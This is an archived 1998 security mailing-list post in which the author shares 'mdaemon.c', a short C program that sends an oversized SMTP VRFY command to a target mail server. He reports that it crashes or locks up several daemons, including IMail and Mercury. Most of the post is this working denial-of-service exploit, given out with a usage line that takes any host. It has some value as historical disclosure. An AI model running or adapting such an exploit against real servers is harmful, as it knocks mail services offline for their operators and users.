smtp overflows

Jon Beaton (steven@EFNI.COM)
Wed, 08 Apr 1998 07:10:25 -0400

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Mike Hardy: "Re: QW server hole"
Previous message: Chris Evans: "QuakeI client: serious holes."

There have been more posts about the buffer overflows on smtp daemons,
so I thought this may be useful. After posting about these attacks on
SLMail and Imail, I found that there were alot more that were still
affected. On the few I've tried on the Mac, like Mercury, it had locked
the server up, much like Appleshare. Anyways, this is just mdaemon.c
with just a few tiny changes, just thought it may be useful. Btw, I just
wanted to note that this will also crash IMail, even though the author
has said it wasn't affected.

Jon

/*
mdaemon.c with a few small changes.
known to lock up the whole server with some daemons on the Mac

Cisc0 @ Undernet
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock, i;

if (argc != 2) {
printf("usage: %s <smtp server>\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
buffer = (char *)malloc(1000);
sprintf(buffer, "VRFY ");
for (i = 0; i<896; i++)
strcat(buffer, "d");
strcat(buffer, "\r\n");
write(sock, &buffer[0], strlen(buffer));
close(sock);
free(buffer);
}

Next message: Mike Hardy: "Re: QW server hole"
Previous message: Chris Evans: "QuakeI client: serious holes."